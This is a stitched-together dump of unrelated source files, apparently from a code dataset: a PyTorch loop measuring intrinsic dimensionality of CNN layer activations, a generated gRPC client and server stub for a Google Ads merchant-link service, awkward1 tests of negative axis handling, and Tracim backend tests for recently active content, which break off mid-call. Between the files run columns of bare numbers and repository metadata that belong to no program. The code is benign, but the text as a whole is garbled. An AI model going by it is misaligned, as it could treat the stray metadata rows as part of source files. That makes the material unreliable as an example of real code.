y_tensor_training_permuted = y_tensor_training_permuted.view(-1)[idx].view(y_tensor_training_permuted.size())
for session in range(start_session, sessions):
# Adjust the learning rate
adjust_learning_rate(optimizer, session, lr)
# Train on the training set
epochs = 180
ID_counter = 0
for epoch in range(epochs):
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, epoch])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_train = torch.index_select(x_tensor_training, 0, indices)
y_train = torch.index_select(y_tensor_training_permuted, 0, indices)
y_train = y_train.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(epochs, [batch_time, losses, top1], prefix = ("Training >>> Session: " + str(session) + " Epoch: [{}]").format(epoch))
# Switch to training mode
model.train()
with torch.set_grad_enabled(True):
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_train = x_train.cuda(gpu)
y_train = y_train.cuda(gpu)
# Compute output
output = model(x_train, x_ref)
loss = criterion(output, y_train)
# Measure accuracy and record loss
acc1 = accuracy(output, y_train, topk = 1)
losses.update(loss.item(), x_train.size(0))
top1.update(acc1[0], x_train.size(0))
# Compute gradient and perform SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Save the validation accuracy for plotting
all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(epoch)
# Remember the best accuracy
is_best = all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch] >= best_acc1
best_acc1 = max(all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch], best_acc1)
if (epoch + 1) % 10 == 0:
ID_counter = ID_counter + 1
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
if model_counter == 0:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 1:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 2:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 3:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 4:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 4, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
### Saving the main variables
scipy.io.savemat(parent_folder + '/all_simulation_training_accuracy.mat', mdict = {'all_simulation_training_accuracy': all_simulation_training_accuracy})
scipy.io.savemat(parent_folder + '/all_simulation_transfer_accuracy.mat', mdict = {'all_simulation_transfer_accuracy': all_simulation_transfer_accuracy})
scipy.io.savemat(parent_folder + '/all_simulation_all_ID.mat', mdict = {'all_simulation_all_ID': all_simulation_all_ID})
scipy.io.savemat(parent_folder + '/all_x_sample_ID.mat', mdict = {'all_x_sample_ID': all_x_sample_ID})
scipy.io.savemat(parent_folder + '/all_simulation_training_accuracy_permuted.mat', mdict = {'all_simulation_training_accuracy_permuted': all_simulation_training_accuracy_permuted})
scipy.io.savemat(parent_folder + '/all_simulation_all_ID_permuted.mat', mdict = {'all_simulation_all_ID_permuted': all_simulation_all_ID_permuted})
| 69.666346
| 279
| 0.547389
| 7,736
| 72,453
| 4.780377
| 0.05817
| 0.106109
| 0.102052
| 0.059625
| 0.870907
| 0.852059
| 0.833915
| 0.820827
| 0.813472
| 0.803088
| 0
| 0.05278
| 0.363767
| 72,453
| 1,040
| 280
| 69.666346
| 0.749463
| 0.053096
| 0
| 0.716138
| 0
| 0
| 0.029342
| 0.009954
| 0
| 0
| 0
| 0
| 0.004323
| 1
| 0.01585
| false
| 0
| 0.028818
| 0
| 0.051873
| 0.020173
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02dca52a95780ec0bd2bc6ffea745aef50374d80
| 8,250
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import merchant_center_link_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2
from google.ads.google_ads.v6.proto.services import merchant_center_link_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2
class MerchantCenterLinkServiceStub(object):
"""Proto file describing the MerchantCenterLink service.
This service allows management of links between Google Ads and Google
Merchant Center.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListMerchantCenterLinks = channel.unary_unary(
'/google.ads.googleads.v6.services.MerchantCenterLinkService/ListMerchantCenterLinks',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.FromString,
)
self.GetMerchantCenterLink = channel.unary_unary(
'/google.ads.googleads.v6.services.MerchantCenterLinkService/GetMerchantCenterLink',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.FromString,
)
self.MutateMerchantCenterLink = channel.unary_unary(
'/google.ads.googleads.v6.services.MerchantCenterLinkService/MutateMerchantCenterLink',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.FromString,
)
class MerchantCenterLinkServiceServicer(object):
"""Proto file describing the MerchantCenterLink service.
This service allows management of links between Google Ads and Google
Merchant Center.
"""
def ListMerchantCenterLinks(self, request, context):
"""Returns Merchant Center links available for this customer.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetMerchantCenterLink(self, request, context):
"""Returns the Merchant Center link in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateMerchantCenterLink(self, request, context):
"""Updates status or removes a Merchant Center link.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MerchantCenterLinkServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ListMerchantCenterLinks': grpc.unary_unary_rpc_method_handler(
servicer.ListMerchantCenterLinks,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.SerializeToString,
),
'GetMerchantCenterLink': grpc.unary_unary_rpc_method_handler(
servicer.GetMerchantCenterLink,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.SerializeToString,
),
'MutateMerchantCenterLink': grpc.unary_unary_rpc_method_handler(
servicer.MutateMerchantCenterLink,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v6.services.MerchantCenterLinkService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MerchantCenterLinkService(object):
"""Proto file describing the MerchantCenterLink service.
This service allows management of links between Google Ads and Google
Merchant Center.
"""
@staticmethod
def ListMerchantCenterLinks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/ListMerchantCenterLinks',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetMerchantCenterLink(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/GetMerchantCenterLink',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def MutateMerchantCenterLink(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/MutateMerchantCenterLink',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 55.369128
| 181
| 0.755152
| 827
| 8,250
| 7.001209
| 0.141475
| 0.067703
| 0.074611
| 0.051813
| 0.803282
| 0.798964
| 0.78981
| 0.736615
| 0.736615
| 0.700345
| 0
| 0.007628
| 0.189576
| 8,250
| 148
| 182
| 55.743243
| 0.858361
| 0.101939
| 0
| 0.466019
| 1
| 0
| 0.104067
| 0.08517
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07767
| false
| 0
| 0.029126
| 0.029126
| 0.165049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f31fc8934e8e851d56e4a1ed1b5752cba9c90bdf
| 4,001
|
py
|
Python
|
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/master/LICENSE
import sys
import pytest
import numpy
import awkward1
def test_array_3d():
array = awkward1.Array(numpy.arange(3*5*2).reshape(3, 5, 2))
assert awkward1.to_list(array) == [[[ 0, 1], [ 2, 3], [ 4, 5], [ 6, 7], [ 8, 9]],
[[10, 11], [12, 13], [14, 15], [16, 17], [18, 19]],
[[20, 21], [22, 23], [24, 25], [26, 27], [28, 29]]]
assert awkward1.num(array, axis=0) == 3
assert awkward1.to_list(awkward1.num(array, axis=1)) == [5, 5, 5]
assert awkward1.to_list(awkward1.num(array, axis=2)) == [[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2]]
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=3)
assert str(err.value).startswith("'axis' out of range for 'num'")
assert awkward1.to_list(awkward1.num(array, axis=-1)) == [[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2]]
assert awkward1.to_list(awkward1.num(array, axis=-2)) == [5, 5, 5]
assert awkward1.num(array, axis=-3) == 3
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=-4)
assert str(err.value).startswith("axis == -4 exceeds the depth == 3 of this array")
def test_list_array():
array = awkward1.Array(numpy.arange(3*5*2).reshape(3, 5, 2).tolist())
assert awkward1.num(array, axis=0) == 3
assert awkward1.num(array, axis=1) == [5, 5, 5]
assert awkward1.num(array, axis=2) == [[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2]]
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=3)
assert str(err.value).startswith("'axis' out of range for 'num'")
assert awkward1.num(array, axis=-1) == [5, 5, 5]
assert awkward1.num(array, axis=-2) == [[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2],
[2, 2, 2, 2, 2]]
assert awkward1.num(array, axis=-3) == 3
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=-4)
assert str(err.value).startswith("axis == -4 exceeds the depth == 3 of this array")
def test_record_array():
array = awkward1.Array([
{"x": [1], "y": [[], [1]]},
{"x": [1, 2], "y": [[], [1], [1, 2]]},
{"x": [1, 2, 3], "y": [[], [1], [1, 2], [1, 2, 3]]}])
assert awkward1.num(array, axis=0).tolist() == {'x': 3, 'y': 3}
assert awkward1.num(array, axis=1).tolist() == [{'x': 1, 'y': 2},
{'x': 2, 'y': 3},
{'x': 3, 'y': 4}]
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=2)
assert str(err.value).startswith("'axis' out of range for 'num'")
assert awkward1.num(array, axis=-1).tolist() == [{'x': 1, 'y': [0, 1]},
{'x': 2, 'y': [0, 1, 2]},
{'x': 3, 'y': [0, 1, 2, 3]}]
def test_record_array_axis_out_of_range():
array = awkward1.Array([
{"x": [1], "y": [[], [1]]},
{"x": [1, 2], "y": [[], [1], [1, 2]]},
{"x": [1, 2, 3], "y": [[], [1], [1, 2], [1, 2, 3]]}])
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=-2)
assert str(err.value).startswith("axis == -2 exceeds the min depth == 2 of this array")
with pytest.raises(ValueError) as err:
assert awkward1.num(array, axis=-3)
assert str(err.value).startswith("axis == -3 exceeds the depth == 2 of this array")
| 46.523256
| 91
| 0.457886
| 543
| 4,001
| 3.342541
| 0.145488
| 0.065014
| 0.090909
| 0.112397
| 0.834711
| 0.804959
| 0.790083
| 0.789532
| 0.787879
| 0.712948
| 0
| 0.098727
| 0.351912
| 4,001
| 85
| 92
| 47.070588
| 0.601234
| 0.021745
| 0
| 0.521739
| 0
| 0
| 0.077965
| 0
| 0
| 0
| 0
| 0
| 0.434783
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.115942
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b868749d2b9e831f210481eb5869909b0afdaf64
| 185,737
|
py
|
Python
|
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
"MIT"
] | null | null | null |
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
"MIT"
] | null | null | null |
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tests for /api/v2/users subpath endpoints.
"""
import pytest
import transaction
from tracim_backend import AuthType
from tracim_backend.app_models.contents import content_type_list
from tracim_backend.error import ErrorCode
from tracim_backend.extensions import app_list
from tracim_backend.fixtures.content import Content as ContentFixtures
from tracim_backend.fixtures.users_and_groups import Base as BaseFixture
from tracim_backend.lib.core.application import ApplicationApi
from tracim_backend.lib.core.content import ContentApi
from tracim_backend.lib.core.group import GroupApi
from tracim_backend.lib.core.user import UserApi
from tracim_backend.lib.core.userworkspace import RoleApi
from tracim_backend.lib.core.workspace import WorkspaceApi
from tracim_backend.models.auth import User
from tracim_backend.models.data import UserRoleInWorkspace
from tracim_backend.models.revision_protection import new_revision
from tracim_backend.models.setup_models import get_tm_session
from tracim_backend.tests import FunctionalTest
from tracim_backend.tests import MailHogFunctionalTest
class TestUserRecentlyActiveContentEndpoint(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active
"""
fixtures = [BaseFixture]
def test_api__get_recently_active_content__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
secondly_created = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
secondly_created_but_not_updated = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
secondly_created_but_not_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
res = res.json_body
assert len(res) == 7
for elem in res:
assert isinstance(elem["content_id"], int)
assert isinstance(elem["content_type"], str)
assert elem["content_type"] != "comments"
assert isinstance(elem["is_archived"], bool)
assert isinstance(elem["is_deleted"], bool)
assert isinstance(elem["label"], str)
assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
assert isinstance(elem["show_in_ui"], bool)
assert isinstance(elem["slug"], str)
assert isinstance(elem["status"], str)
assert isinstance(elem["sub_content_types"], list)
for sub_content_type in elem["sub_content_types"]:
assert isinstance(sub_content_type, str)
assert isinstance(elem["workspace_id"], int)
# comment is newest than page2
assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
# last updated content is newer than other one despite creation
# of the other is more recent
assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
# creation order is inverted here as last created is last active
assert res[4]["content_id"] == secondly_created.content_id
assert res[5]["content_id"] == firstly_created.content_id
# folder subcontent modification does not change folder order
assert res[6]["content_id"] == main_folder.content_id
def test_api__get_recently_active_content__err__400__no_access_to_workspace(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
